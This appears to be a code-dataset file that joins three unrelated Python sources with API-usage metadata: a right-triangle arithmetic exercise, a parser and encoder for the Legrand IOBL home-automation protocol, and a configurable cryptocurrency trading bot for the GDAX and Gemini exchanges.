Purpose: Python Village - Variables and Some Arithmetic
"""
import argparse
class BadIntegerValue(Exception):
"""Base class for other exception """
# --------------------------------------------------
def get_args():
""" Get command-line arguments """
parser = argparse.ArgumentParser(
description="""Variables and Some Arithmetic. Given two integers,
a and b, each less than 1000, this program returns the square of the
hypothenuse of the right triangle whose legs have lenghts a and b.""",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('input_file',
metavar='FILE',
type=argparse.FileType('rt'),
help='Input file, max 2 integers')
args = parser.parse_args()
return args.input_file.read().rstrip().split()
# --------------------------------------------------
def main():
"""Returns the square of the hypothenuse of a triangle
with a and b legs"""
args = get_args()
list_int = [int(x) for x in args]
for i in list_int:
test_int(i)
a, b = list_int
h = (a*a) + (b*b)
print(h)
# --------------------------------------------------
def test_int(v):
"""Test if integer v is less than 1000"""
if v >= 1000:
raise BadIntegerValue("Integer must be less than 1000.")
# --------------------------------------------------
if __name__ == '__main__':
main()
|
[
"argparse.ArgumentParser",
"argparse.FileType"
] |
[((343, 654), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Variables and Some Arithmetic. Given two integers,\n a and b, each less than 1000, this program returns the square of the\n hypothenuse of the right triangle whose legs have lenghts a and b."""', 'formatter_class': 'argparse.ArgumentDefaultsHelpFormatter'}), '(description=\n """Variables and Some Arithmetic. Given two integers,\n a and b, each less than 1000, this program returns the square of the\n hypothenuse of the right triangle whose legs have lenghts a and b."""\n , formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n', (366, 654), False, 'import argparse\n'), ((770, 793), 'argparse.FileType', 'argparse.FileType', (['"""rt"""'], {}), "('rt')\n", (787, 793), False, 'import argparse\n')]
|
"""Parsers."""
import re
from enum import Enum
from typing import Any, Dict, cast
UNKNOWN = 'unknown'
DELIM = '*'
SPECIAL_REQUEST = r'^\*#\d{2,4}\*\*\d{1,2}##$'
# *#*1##
ACK = r'^\*#\*(1)##$'
# *#*0##
NACK = r'^\*#\*(0)##$'
ACK_NACK_RE = r'|'.join([ACK, NACK])
# *WHO*WHAT*WHERE## *1*1*0#13236017##
BUS_COMMAND = r'^\*(\d+)\*(\d+#?\d*#?\d*#?)\*(\d*#*\d+#*\d*)##$'
# *#WHO*WHERE
STATUS_REQUEST = r'\*#(\d+)\*(\d*#*\d+#*\d*)##$'
# *#WHO*WHERE*DIMENSION(*VAL1*VALn)##
DIMENSION_REQUEST = r'^\*#(\d+)\*(\d*#*\d+#*\d*)\*([\d#\*]+)##$'
# *#WHO*WHERE*#DIMENSION*VAL1*VALn##
DIMENSION_SET = r'^\*#(\d+)\*(\d*#*\d+#*\d*)\*(\d*#*\d+#*\d*)##$'
WHERE_DEFINITION = r'(\d+)?#*(\d+)?#*(\d*)$'
WHAT_DEFINITION = r'(\d+)#?(\d*)#?(\d*)#?'
DIMENSION_DEFINITION = r'([\d#]+)\*?(\d*)(.*)'
VAL_DEFINITION = r'\*?(\d+)(.*)'
bus_command_re = re.compile(BUS_COMMAND)
ack_nack_re = re.compile(ACK_NACK_RE)
special_request_re = re.compile(SPECIAL_REQUEST)
status_request_re = re.compile(STATUS_REQUEST)
dimension_req_re = re.compile(DIMENSION_REQUEST)
dimension_set_re = re.compile(DIMENSION_SET)
where_decode_re = re.compile(WHERE_DEFINITION)
what_decode_re = re.compile(WHAT_DEFINITION)
dimension_decode_re = re.compile(DIMENSION_DEFINITION)
val_decode_re = re.compile(VAL_DEFINITION)
class iobl_packet(Enum):
"""Open Packet definition."""
devicetype = {
'1': 'light',
'2': 'automation',
'4': 'thermoregulation',
'8': 'doorentry',
'25': 'scenario',
'13': 'management',
'14': 'special',
'1000': 'configuration',
}
# """light command identification."""
light_command = {
'1': 'on',
'0': 'off',
'38': 'dim_stop',
}
# """light dimension set identification."""
light_dimension = {
'10': 'dim_step',
'1': 'go_to_level_time',
}
# """shutter command identification."""
automation_command = {
'0': 'move_stop',
'1': 'move_up',
'2': 'move_down',
}
# """thermoregulation command identification."""
thermoregulation_command = {
#"""thermoregulation command identification."""
'50': 'setpoint',
'51': 'override_setpoint',
'52': 'end_override',
'53': 'go_to_temperature',
'54': 'stop',
'55': 'end_stop',
'56': 'stop_fan_speed',
'57': 'low_fan_speed',
'58': 'high_fan_speed',
'59': 'confort_jour_rouge',
}
# """scenario command identification."""
scenario_command = {
'11': 'action',
'16': "stop_action",
'17': "action_for_time",
'18': "action_in_time",
'19': "info_scene_off"
}
# """door entry command identification."""
door_entry_command = {
'1': 'concierge_call',
'19': 'locker_control'
}
# """configuration command identification."""
configuration_command = {
'61': 'open_learning',
'62': 'close_learning',
'63': 'address_erase',
'64': 'memory_reset',
'65': 'memory_full',
'66': 'memory_read',
'72': 'valid_action',
'73': 'invalid_action',
'68': 'cancel_id',
'69': 'management_clock_synchronisation',
'70': 'occupied',
'71': 'unoccupied'
}
# """configuration dimension identification."""
configuration_dimension = {
'13': 'announce_id',
'51': 'device_description_request',
'55': 'unit_description_request',
}
communication_mode = {
'0': 'broadcast',
'1': 'multicast',
'2': 'unicast_direct',
'3': 'unicast',
'': 'unicast',
}
communication_media = {
'0': 'plc',
'1': 'rf',
'2': 'ir',
'': 'plc',
}
def valid_packet(packet: str) -> bool:
"""Verify if packet is valid."""
return (bool(bus_command_re.match(packet)) |
bool(ack_nack_re.match(packet)) |
bool(status_request_re.match(packet)) |
bool(dimension_req_re.match(packet)) |
bool(dimension_set_re.match(packet)))
def decode_packet(packet: str) -> dict:
"""Break packet down into primitives, and do basic interpretation."""
if bool(bus_command_re.match(packet)):
who, what, where = bus_command_re.match(packet).group(1, 2, 3)
data = cast(Dict[str, Any], {
'who': devicetype.get(who),
})
device_type_name = {v: k for k, v in devicetype.items()}
command = what_decode_re.match(what).group(1)
if who == device_type_name.get('light'):
data['what'] = light_command.get(what)
elif who == device_type_name.get('automation'):
data['what'] = automation_command.get(what)
elif who == device_type_name.get('scenario'):
data['what'] = scenario_command.get(command)
elif who == device_type_name.get('configuration'):
data['what'] = configuration_command.get(command)
elif who == device_type_name.get('doorentry'):
data['what'] = door_entry_command.get(what)
elif who == device_type_name.get('thermoregulation'):
data['what'] = thermoregulation_command.get(command)
data['legrand_id'], data['unit'], data['mode'], data['media'] = parse_legrand_id(str(where))
data['type'] = 'bus_command'
data['command'] = ''
elif bool(ack_nack_re.match(packet)):
if ack_nack_re.match(packet).group(1) == '0':
data = cast(Dict[str, Any], {
'type': 'nack',
'legrand_id': '',
})
else:
data = cast(Dict[str, Any], {
'type': 'ack',
'legrand_id': '',
})
elif bool(status_request_re.match(packet)):
who, where = status_request_re.match(packet).group(1, 2)
data = cast(Dict[str, Any], {
'type': 'status_request',
'who': devicetype.get(who),
})
data['legrand_id'], data['unit'], data['mode'], data['media'] = parse_legrand_id(str(where))
elif bool(dimension_req_re.match(packet)):
who, where, dimension = dimension_req_re.match(packet).group(1, 2, 3)
data = cast(Dict[str, Any], {
'type': 'dimension_request',
'who': devicetype.get(who),
})
data['legrand_id'], data['unit'], data['mode'], data['media'] = parse_legrand_id(str(where))
data['dimension'], data['val'] = parse_dimension(dimension)
elif bool(dimension_set_re.match(packet)):
who, where = dimension_set_re.match(packet).group(1, 2)
data = cast(Dict[str, Any], {
'type': 'dimension_set',
'who': devicetype.get(who),
})
data['legrand_id'], data['unit'], data['mode'], data['media'] = parse_legrand_id(str(where))
return data
def parse_legrand_id(where: str):
"""Extract legrand id from where token."""
result = where_decode_re.match(where)
match1, match2, match3 = result.group(1, 2, 3)
if match1 is not None and len(match1) > 1:
legrandid, unit = get_id_unit(match1)
media = communication_media.get(match2)
mode = communication_mode.get('')
elif match2 is not None and len(match2) > 1:
legrandid, unit = get_id_unit(match2)
media = communication_media.get(match3)
if match1 is not None:
mode = communication_mode.get(match1)
else:
mode = communication_mode.get('')
return (legrandid, unit, mode, media)
def parse_dimension(dimension: str):
"""Extract dimension and vals from dimension token."""
decoded_dim, newval, new_dimension = dimension_decode_re.match(dimension).group(1, 2, 3)
val = list()
if newval:
val.append(newval)
while new_dimension:
newval, new_dimension = val_decode_re.match(new_dimension).group(1, 2)
if newval:
val.append(newval)
return decoded_dim, val
def get_id_unit(idstr: str):
"""Extract the ID part in the ID string."""
tmpid = hex(int(idstr))
if len(tmpid) == 7:
unitsize = 2
else:
unitsize = 1
unit = tmpid[-unitsize:]
legrand_id = str(int(tmpid[0:-unitsize], 0))
return (legrand_id, unit)
def encode_packet(packet_fields: dict) -> str:
"""Call the encoding method according packet type."""
if packet_fields.get('type') == 'bus_command':
return encode_bus_command(packet_fields)
elif packet_fields.get('type') == 'set_dimension':
return encode_set_dimension(packet_fields)
else:
return ''
def encode_bus_command(packet_fields: dict) -> str:
"""Encode the input fields into an IOBL bus_command packet."""
where = encode_where(packet_fields.get('legrand_id'), packet_fields.get('unit'),
packet_fields.get('mode'), packet_fields.get('media'))
device_type_name = {v: k for k, v in devicetype.items()}
if packet_fields.get('who') == 'light':
light_command_name = {v: k for k, v in light_command.items()}
encoded_packet = '*' + device_type_name.get(packet_fields.get('who')) + '*' + light_command_name.get(packet_fields.get('what')) + '*' + where + '##'
elif packet_fields.get('who') == 'automation':
automation_command_name = {v: k for k, v in automation_command.items()}
encoded_packet = '*' + device_type_name.get(packet_fields.get('who')) + '*' + automation_command_name.get(packet_fields.get('what')) + '*' + where + '##'
elif packet_fields.get('who') == 'thermoregulation':
thermoregulation_command_name = {v: k for k, v in thermoregulation_command.items()}
encoded_packet = '*' + device_type_name.get(packet_fields.get('who')) + '*' + thermoregulation_command_name.get(packet_fields.get('what')) + '*' + where + '##'
elif packet_fields.get('who') == 'doorentry':
door_entry_command_name = {v: k for k, v in door_entry_command.items()}
encoded_packet = '*' + device_type_name.get(packet_fields.get('who')) + '*' + door_entry_command_name.get(packet_fields.get('what')) + '*' + where + '##'
elif packet_fields.get('who') == 'scenario':
scenario_command_name = {v: k for k, v in scenario_command.items()}
encoded_packet = '*' + device_type_name.get(packet_fields.get('who')) + '*' + scenario_command_name.get(packet_fields.get('what')) + '*' + where + '##'
elif packet_fields.get('who') == 'configuration':
configuration_command_name = {v: k for k, v in configuration_command.items()}
encoded_packet = '*' + device_type_name.get(packet_fields.get('who')) + '*' + configuration_command_name.get(packet_fields.get('what')) + '*' + where + '##'
return encoded_packet
def encode_set_dimension(packet_fields: dict) -> str:
"""Encode the input fields into an IOBL set_dimension/dimension_request packet."""
where = encode_where(packet_fields.get('legrand_id'), packet_fields.get('unit'),
packet_fields.get('mode'), packet_fields.get('media'))
pkt_values = ''
for value in packet_fields.get('values'):
pkt_values = pkt_values + '*' + value
device_type_name = {v: k for k, v in devicetype.items()}
if packet_fields.get('who') == 'light':
light_dimension_name = {v: k for k, v in light_dimension.items()}
encoded_packet = '*#' + device_type_name.get(packet_fields.get('who')) + '*' + where + '*' + light_dimension_name.get(packet_fields.get('dimension')) + pkt_values + '##'
elif packet_fields.get('who') == 'configuration':
configuration_dimension_name = {v: k for k, v in configuration_dimension.items()}
encoded_packet = '*#' + device_type_name.get(packet_fields.get('who')) + '*' + where + '*' + configuration_dimension_name.get(packet_fields.get('dimension')) + pkt_values + '##'
return encoded_packet
def encode_where(legrandid: str, unit: str, com_mode: str, com_media: str) -> str:
"""Encode the where clause of IOBL packet."""
where = encode_id_unit(legrandid, unit)
communication_media_name = {v: k for k, v in communication_media.items()}
communication_mode_name = {v: k for k, v in communication_mode.items()}
if com_mode == 'unicast' or com_mode == 'multicast':
if com_media == 'plc':
where = str(where)
else:
where = str(where) + '#' + communication_media_name.get(com_media)
elif com_mode == 'broadcast':
# When in broadcast mode, the legrand_id provided shall be the source address
if com_media == 'plc':
where = communication_mode_name.get('broadcast') + '#' + str(where)
else:
where = communication_mode_name.get('broadcast') + '#' + str(where) + '#' + communication_media_name.get(com_media)
else:
where = '#' + str(where)
return where
def encode_id_unit(legrandid: str, unit: str) -> str:
"""Encode the input legrand_id and unit."""
legrandid = hex(int(legrandid))
return int(legrandid + unit, 0)
|
[
"typing.cast",
"re.compile"
] |
[((830, 853), 're.compile', 're.compile', (['BUS_COMMAND'], {}), '(BUS_COMMAND)\n', (840, 853), False, 'import re\n'), ((868, 891), 're.compile', 're.compile', (['ACK_NACK_RE'], {}), '(ACK_NACK_RE)\n', (878, 891), False, 'import re\n'), ((913, 940), 're.compile', 're.compile', (['SPECIAL_REQUEST'], {}), '(SPECIAL_REQUEST)\n', (923, 940), False, 'import re\n'), ((961, 987), 're.compile', 're.compile', (['STATUS_REQUEST'], {}), '(STATUS_REQUEST)\n', (971, 987), False, 'import re\n'), ((1007, 1036), 're.compile', 're.compile', (['DIMENSION_REQUEST'], {}), '(DIMENSION_REQUEST)\n', (1017, 1036), False, 'import re\n'), ((1056, 1081), 're.compile', 're.compile', (['DIMENSION_SET'], {}), '(DIMENSION_SET)\n', (1066, 1081), False, 'import re\n'), ((1101, 1129), 're.compile', 're.compile', (['WHERE_DEFINITION'], {}), '(WHERE_DEFINITION)\n', (1111, 1129), False, 'import re\n'), ((1147, 1174), 're.compile', 're.compile', (['WHAT_DEFINITION'], {}), '(WHAT_DEFINITION)\n', (1157, 1174), False, 'import re\n'), ((1197, 1229), 're.compile', 're.compile', (['DIMENSION_DEFINITION'], {}), '(DIMENSION_DEFINITION)\n', (1207, 1229), False, 'import re\n'), ((1246, 1272), 're.compile', 're.compile', (['VAL_DEFINITION'], {}), '(VAL_DEFINITION)\n', (1256, 1272), False, 'import re\n'), ((5202, 5258), 'typing.cast', 'cast', (['Dict[str, Any]', "{'type': 'nack', 'legrand_id': ''}"], {}), "(Dict[str, Any], {'type': 'nack', 'legrand_id': ''})\n", (5206, 5258), False, 'from typing import Any, Dict, cast\n'), ((5339, 5394), 'typing.cast', 'cast', (['Dict[str, Any]', "{'type': 'ack', 'legrand_id': ''}"], {}), "(Dict[str, Any], {'type': 'ack', 'legrand_id': ''})\n", (5343, 5394), False, 'from typing import Any, Dict, cast\n')]
|
import tradebotapiclient
import tradebotgdaxclient
import tickerdb
import math
import time
import datetime
import traceback
import random
import yaml
import sys
import os.path
import tradeerrors
import os
class Tradebot(object):
def issuebuyorder(self,current):
cryptotobuy = self.base_unit / current
self.buyrate = current
id = None
i = len(self.sym)-3
j = len(self.sym)
if self.dryrun:
self.tprint("NOOP: Issuing buy order for %f %s at %f %s" % (cryptotobuy,self.sym[0:3],self.buyrate,self.sym[i:j]))
id = 0
else:
self.tprint("Issuing buy order for %f %s at %f %s" % (cryptotobuy,self.sym[0:3],self.buyrate,self.sym[i:j]))
id, status, executed_amount = self.tradebotapiclient.buy(cryptotobuy,current,4,10)
if id is not None:
self.tprint("Buy order %f has status: %s" % (id,status))
if status == "full" or status == "partial": #Buy was successful
self.crypto_bought = executed_amount
self.tprint("Bought crypto amount %f " % self.crypto_bought)
else: #in case of a failure perform random backoff
self.errorwithrandombackoff(self.interval,300)
id = None
return id
def issuesellorder(self,current):
cryptotosell = self.base_unit / current
self.sellrate = current
id = None
i = len(self.sym)-3
j = len(self.sym)
if self.dryrun:
self.tprint("NOOP: Issuing sell order for %f %s at %f %s" % (cryptotosell,self.sym[0:3],self.sellrate,self.sym[i:j]))
id = 0
else:
self.tprint("NOOP: Issuing sell order for %f %s at %f %s" % (cryptotosell,self.sym[0:3],self.sellrate,self.sym[i:j]))
id, status, executed_amount = self.tradebotapiclient.sell(cryptotosell,current,4,10)
if id is not None:
self.tprint("Sell order %f has status: %s" % (id,status))
if status == "full" or status == "partial": #Sell was successful
self.crypto_sold = executed_amount
self.tprint("Sold crypto amount %f " % self.crypto_sold)
if self.crypto_bought is not None:
crypto_new = self.crypto_bought - self.crypto_sold
self.tprint("Crypto added since previous buy: %f " % crypto_new)
self.crypto_added = self.crypto_added + crypto_new
self.tprint("Total crypto added: %f " % self.crypto_added)
else: #in case of a failure perform random backoff
self.errorwithrandombackoff(self.interval,300)
id = None
return id
#State changes for auto mode. Override for other modes
def nextstate(self):
if self.state == 0: #prebuy
if self.botparmsdict['trailing_buy_percent'] > 0:
self.state = 1 #buy or auto mode
else:
if self.mode == "auto": #mode is auto and trailing_percent == 0
self.state = 2
else: #mode is buy and trailing_percent == 0
self.iterations = self.iterations + 1
elif self.state ==1: #trailingbuy
if self.mode == "buy":
self.iterations = self.iterations + 1
self.state = 0
else: #mode is auto
self.state = 2
elif self.state ==2: #presell
if self.botparmsdict['trailing_sell_percent'] > 0:
self.state = 3 #sell or auto mode
else:
self.iterations = self.iterations + 1
if self.mode == "auto":
self.state = 0 #mode is auto and trailing_percent == 0
else:
pass #mode is sell and trailing_percent == 0
elif self.state == 3: #trailingsell
self.iterations = self.iterations + 1
if self.mode == "sell":
self.state = 2 #Go back to pre-sell
else: #Mode is auto - go back to beginning
self.state = 0
if self.iterations >= self.iterations_to_live:
self.state = -1
self.tprint("Tradebot stopping, reached iterations to live")
self.interval = 0.5
return
else:
self.interval = self.intervals[self.state_names[self.state]]
def run(self):
self.errorcount = 0
self.fatalerrors = 0
self.maxfatalerrors = 3
self.maxconterrors = 15 #If there are 10 continuous errors then we should quit
self.conterrors = 0
self.crypto_added = 0
self.tprint("Tradebot starting, output key: [State: %s| Iteration: %d]" % (self.state_names[self.state],self.iterations))
while True:
try:
if self.state == -1: #Stopping if this flag is set
break
if os.path.isfile(self.stopfilename) or os.path.isfile(self.globalstopfilename): #stop if this file is found
self.tprint("Stopping due to presence of stopfile: %s, or global stopfile: %s" % (self.stopfilename, self.globalstopfilename))
break
current = self.tickerdb.last(self.sym)
if self.state == 0: #prebuy state
base_value = self.base_value_method(self.sym)
delta = self.getabsbasedelta(current,base_value,"current",self.botparmsdict['base_value'])
if current < base_value and delta >= self.botparmsdict['buy_delta_percent']:
if self.botparmsdict['trailing_buy_percent'] == 0: #issue immediate buy
if self.issuebuyorder(current) is not None:
self.nextstate()
else: #trigger trailing stop buy state
self.trailing_buy_low = current
self.trailing_buy_high = current * (100 + self.botparmsdict['trailing_buy_percent'])/100
self.nextstate()
elif self.state == 1: #trailing stop buy state
base_value = self.base_value_method(self.sym)
delta = self.getabsbasedelta(current,base_value,"current",self.botparmsdict['base_value'])
if current < self.trailing_buy_low:
self.trailing_buy_low = current
self.trailing_buy_high = current * (100 + self.botparmsdict['trailing_buy_percent'])/100
elif current > self.trailing_buy_high and current < base_value:
if self.issuebuyorder(current) is not None:
self.nextstate()
elif self.state == 2: #presell
delta = self.getabsbasedelta(current,self.buyrate,"current","buy rate")
if current > self.buyrate and delta >= self.botparmsdict['sell_delta_percent']:
if self.botparmsdict['trailing_sell_percent'] == 0: #issue immediate sell
if self.issuesellorder(current) is not None:
self.nextstate()
else: #trigger trailing stop sell
self.trailing_sell_high = current
self.trailing_sell_low = current * (100 - self.botparmsdict['trailing_sell_percent'])/100
self.nextstate()
elif self.state == 3: #trailing stop sell state
delta = self.getabsbasedelta(current,self.buyrate,"current","buy rate")
if current > self.trailing_sell_high:
self.trailing_sell_high = current
self.trailing_sell_low = current * (100 - self.botparmsdict['trailing_sell_percent'])/100
elif current < self.trailing_sell_low and current > self.buyrate:
if self.issuesellorder(current) is not None:
self.nextstate()
if self.conterrors > 0: #Reset continuous errors to zero
self.conterrors = 0
time.sleep(self.interval)
except tradeerrors.InsufficientFundsError as ife: #Exit immediately
self.tprint(str(ife))
traceback.print_exc()
break
except tradeerrors.OrderPlacementError as ope: #Try backing off with 3 retries max
self.tprint(str(ope))
traceback.print_exc()
if self.fatalerrors < self.maxfatalerrors:
self.fatalerrors = self.fatalerrors + 1
self.errorwithrandombackoff(self.interval+300,300)
else:
self.tprint("Exiting due to reaching maximum # of fatal errors: %d" % self.maxfatalerrors)
break
except tradeerrors.UnknownResponseError as ure: #Try backing off with 3 retries max
self.tprint(str(ure))
traceback.print_exc()
if self.fatalerrors < self.maxfatalerrors:
self.fatalerrors = self.fatalerrors + 1
self.errorwithrandombackoff(self.interval+300,300)
else:
self.tprint("Exiting due to reaching maximum # of fatal errors: %d" % self.maxfatalerrors)
break
except Exception as e: #General errors: log and keep going
self.tprint(str(e))
traceback.print_exc()
if self.conterrors < self.maxconterrors:
self.conterrors = self.conterrors + 1
self.errorwithrandombackoff(self.conterrors*self.interval,100)
else:
self.tprint("Exiting due to reaching maximum # of continuous errors: %d" % self.maxconterrors)
break
self.tradebotapiclient.gracefulstop()
def errorwithrandombackoff(self,minimum,randomrange):
self.errorcount = self.errorcount + 1
backofftime = minimum + random.randint(0,randomrange)
self.tprint("ERROR: Error count %d, pausing for %d seconds" % (self.errorcount,backofftime) )
time.sleep(backofftime)
def getabsbasedelta(self,val,base,val_desc,base_desc):
cmp = "+"
if val < base:
cmp = "-"
delta = ((math.fabs(val-base) / base)*100)
roc = delta - self.prevdelta
self.prevdelta = delta
self.tprint("%s [%f], %s [%f], delta: %s%f%% (roc: %f)" % (val_desc,val,base_desc,base,cmp,delta,roc))
return delta
#prints a message with state and timestamp
def tprint(self,msg):
now = datetime.datetime.now()
t = now.strftime("%y-%m-%d %H:%M:%S")
print("[%s][%s|%d] %s" % (str(t),self.state_names[self.state],self.iterations,msg))
def get_base_value(self,sym):
return self.base_value
def __init__(self, bot_name, cfg, redirect_output):
self.bot_name = bot_name
self.state_names = ['prebuy','trailing_buy','presell','trailing_sell']
#Redirecting output
if redirect_output:
logs_dir = "logs"
out_path = logs_dir + "/" + bot_name + ".out.txt"
err_path = logs_dir + "/" + bot_name + ".err.txt"
if os.path.exists(logs_dir) and not os.path.exists(out_path) and not os.path.exists(err_path):
print("NOTE: Redirecting stderr to %s, and stdout to: %s" % (err_path,out_path)) #Not using tprint as state has not been established
sys.stdout = open(out_path, 'w')
sys.stderr = open(err_path, 'w')
#Set streams to unbuffered
sys.stdout = Unbuffered(sys.stdout)
sys.stderr = Unbuffered(sys.stderr)
else: #Not using tprint as state has not been established
msg = "ERROR: Logs directory: %s does not exist, or log files: %s %s exist" % (logs_dir,out_path,err_path)
print(msg)
e = tradeerrors.BotIniterror(msg)
raise(e)
#Enable safemode by default or in case of missing api credentials
if 'safemode' not in cfg or 'api_key' not in cfg or 'api_secret' not in cfg:
cfg['safemode'] = True
elif cfg['safemode'] == True and cfg['exchange'] == "gdax" and 'passphrase' not in cfg:
cfg['safemode'] = True
else:
pass
#In case of safemode clear out credentials from memory
if cfg['safemode']:
cfg['passphrase'] = None
cfg['api_key'] = None
cfg['api_secret'] = None
#Handle required parameters
self.botparmsdict = {
'sym': cfg['sym'],
'exchange': cfg['exchange'],
'dryrun': bool(cfg['safemode']),
'base_unit': float(cfg['base_unit']),
'mode': cfg['mode'],
'base_value': cfg['base_value'],
'trailing_buy_percent': cfg['trailing_percent'],
'trailing_sell_percent': cfg['trailing_percent'],
}
#Populate required parameters
self.sym = self.botparmsdict['sym']
self.base_unit = self.botparmsdict['base_unit']
self.dryrun = self.botparmsdict['dryrun']
self.mode = self.botparmsdict['mode']
if self.mode == "auto" or self.mode == "sell":
self.botparmsdict['sell_delta_percent'] = float(cfg['sell_delta_percent'])
if self.mode == "auto" or self.mode == "buy":
self.botparmsdict['buy_delta_percent'] = float(cfg['buy_delta_percent'])
if self.mode == "sell":
self.botparmsdict['prev_purchase_val'] = float(cfg['prev_purchase_val'])
#Handle optional parameters
if 'iterations_to_live' not in cfg:
self.botparmsdict['iterations_to_live'] = 3
else:
self.botparmsdict['iterations_to_live'] = int(cfg['iterations_to_live'])
if 'default_interval' not in cfg:
self.botparmsdict['default_interval'] = 60
else:
self.botparmsdict['default_interval'] = int(cfg['default_interval'])
if 'trailing_interval' not in cfg:
self.botparmsdict['trailing_interval'] = 10
else:
self.botparmsdict['trailing_interval'] = int(cfg['trailing_interval'])
#populate optional parameters
self.interval = self.botparmsdict['default_interval']
self.iterations_to_live = self.botparmsdict['iterations_to_live']
#Instantiate API Client
exchange = cfg['exchange']
if exchange == 'gdax':
self.tradebotapiclient = tradebotgdaxclient.Tradebotgdaxclient(cfg)
self.tickerdb = tickerdb.Tickerdb("gdax",self.sym)
elif exchange == 'gemini':
self.tradebotapiclient = tradebotapiclient.Tradebotapiclient(cfg)
self.tickerdb = tickerdb.Tickerdb("gemini",self.sym)
else:
e = tradeerrors.InputError(exchange,"exchange")
raise(e)
#handle base_value parameter:
base_value = cfg['base_value']
if base_value == "daily_avg":
self.base_value_method = self.tickerdb.getDailyAverage
elif base_value == "weekly_avg":
self.base_value_method = self.tickerdb.getWeeklyAverage
elif base_value == "hourly_avg":
self.base_value_method = self.tickerdb.getHourlyAverage
elif base_value == "monthly_avg":
self.base_value_method = self.tickerdb.getMonthlyAverage
else: #A static value was set
self.base_value = float(base_value)
if self.mode == "buy":
self.base_value_method = self.get_base_value
else:
self.tprint("ERROR: A static base_value is only allowed with buy modes")
e = tradeerrors.InputError(str(self.base_value),"base_value")
raise(e)
#set initial state
self.iterations = 0
self.stopfilename = self.bot_name+".stop"
self.globalstopfilename = "bot.stop"
self.prevdelta = 0
if self.mode == "auto" or self.mode == "buy":
self.state = 0
elif self.mode == "sell":
self.buyrate = self.botparmsdict['prev_purchase_val']
self.state = 2
self.crypto_bought = self.base_unit / self.buyrate
else:
e = tradeerrors.InputError(self.mode,"mode")
raise(e)
self.tprint("INFO: Successfully Initialized Tradebot instance with bot_name %s and parameter set %s " % (self.bot_name,self.botparmsdict))
self.tprint("INFO: To stop, create an empty file called in current directory: %s" % self.stopfilename)
if self.dryrun:
self.tprint("INFO: SAFEMODE (DRYRUN) IS ON. No buy or sell orders will be issued.")
else:
self.tprint("WARNING: SAFEMODE (DRYRUN) IS OFF, WILL ISSUE BUY / SELL ORDERS, CONSIDER RISK OF LOSS!")
self.intervals = {
'prebuy': self.botparmsdict['default_interval'],
'trailing_buy': self.botparmsdict['trailing_interval'],
'presell': self.botparmsdict['default_interval'],
'trailing_sell': self.botparmsdict['trailing_interval']
}
#A class to flush output on every print
#https://stackoverflow.com/questions/107705/disable-output-buffering
class Unbuffered(object):
def __init__(self, stream):
self.stream = stream
def write(self, data):
self.stream.write(data)
self.stream.flush()
def writelines(self, datas):
self.stream.writelines(datas)
self.stream.flush()
def __getattr__(self, attr):
return getattr(self.stream, attr)
#Main method to run without a tradebot manager
def main(bot_name):
config_file_name = "config.yml"
try:
with open(config_file_name, 'r') as ymlfile:
cfg = yaml.load(ymlfile)
ymlfile.close()
bot = Tradebot(bot_name,cfg[bot_name],False)
bot.run()
except Exception as e:
print(str(e))
traceback.print_exc()
if __name__ == "__main__":
if len(sys.argv) < 2:
print("ERROR: must provide a bot name from config.yml")
else:
main(sys.argv[1])
|
[
"yaml.load",
"traceback.print_exc",
"tradebotapiclient.Tradebotapiclient",
"random.randint",
"math.fabs",
"os.path.exists",
"time.sleep",
"tradeerrors.BotIniterror",
"os.path.isfile",
"tradebotgdaxclient.Tradebotgdaxclient",
"tickerdb.Tickerdb",
"tradeerrors.InputError",
"datetime.datetime.now"
] |
[((10600, 10623), 'time.sleep', 'time.sleep', (['backofftime'], {}), '(backofftime)\n', (10610, 10623), False, 'import time\n'), ((11088, 11111), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (11109, 11111), False, 'import datetime\n'), ((10460, 10490), 'random.randint', 'random.randint', (['(0)', 'randomrange'], {}), '(0, randomrange)\n', (10474, 10490), False, 'import random\n'), ((15110, 15152), 'tradebotgdaxclient.Tradebotgdaxclient', 'tradebotgdaxclient.Tradebotgdaxclient', (['cfg'], {}), '(cfg)\n', (15147, 15152), False, 'import tradebotgdaxclient\n'), ((15182, 15217), 'tickerdb.Tickerdb', 'tickerdb.Tickerdb', (['"""gdax"""', 'self.sym'], {}), "('gdax', self.sym)\n", (15199, 15217), False, 'import tickerdb\n'), ((18396, 18414), 'yaml.load', 'yaml.load', (['ymlfile'], {}), '(ymlfile)\n', (18405, 18414), False, 'import yaml\n'), ((18581, 18602), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (18600, 18602), False, 'import traceback\n'), ((8458, 8483), 'time.sleep', 'time.sleep', (['self.interval'], {}), '(self.interval)\n', (8468, 8483), False, 'import time\n'), ((10766, 10787), 'math.fabs', 'math.fabs', (['(val - base)'], {}), '(val - base)\n', (10775, 10787), False, 'import math\n'), ((11721, 11745), 'os.path.exists', 'os.path.exists', (['logs_dir'], {}), '(logs_dir)\n', (11735, 11745), False, 'import os\n'), ((12447, 12476), 'tradeerrors.BotIniterror', 'tradeerrors.BotIniterror', (['msg'], {}), '(msg)\n', (12471, 12476), False, 'import tradeerrors\n'), ((15289, 15329), 'tradebotapiclient.Tradebotapiclient', 'tradebotapiclient.Tradebotapiclient', (['cfg'], {}), '(cfg)\n', (15324, 15329), False, 'import tradebotapiclient\n'), ((15359, 15396), 'tickerdb.Tickerdb', 'tickerdb.Tickerdb', (['"""gemini"""', 'self.sym'], {}), "('gemini', self.sym)\n", (15376, 15396), False, 'import tickerdb\n'), ((15426, 15470), 'tradeerrors.InputError', 'tradeerrors.InputError', (['exchange', '"""exchange"""'], {}), "(exchange, 'exchange')\n", (15448, 15470), False, 'import tradeerrors\n'), ((16892, 16933), 'tradeerrors.InputError', 'tradeerrors.InputError', (['self.mode', '"""mode"""'], {}), "(self.mode, 'mode')\n", (16914, 16933), False, 'import tradeerrors\n'), ((5080, 5113), 'os.path.isfile', 'os.path.isfile', (['self.stopfilename'], {}), '(self.stopfilename)\n', (5094, 5113), False, 'import os\n'), ((5117, 5156), 'os.path.isfile', 'os.path.isfile', (['self.globalstopfilename'], {}), '(self.globalstopfilename)\n', (5131, 5156), False, 'import os\n'), ((8631, 8652), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (8650, 8652), False, 'import traceback\n'), ((8841, 8862), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (8860, 8862), False, 'import traceback\n'), ((9380, 9401), 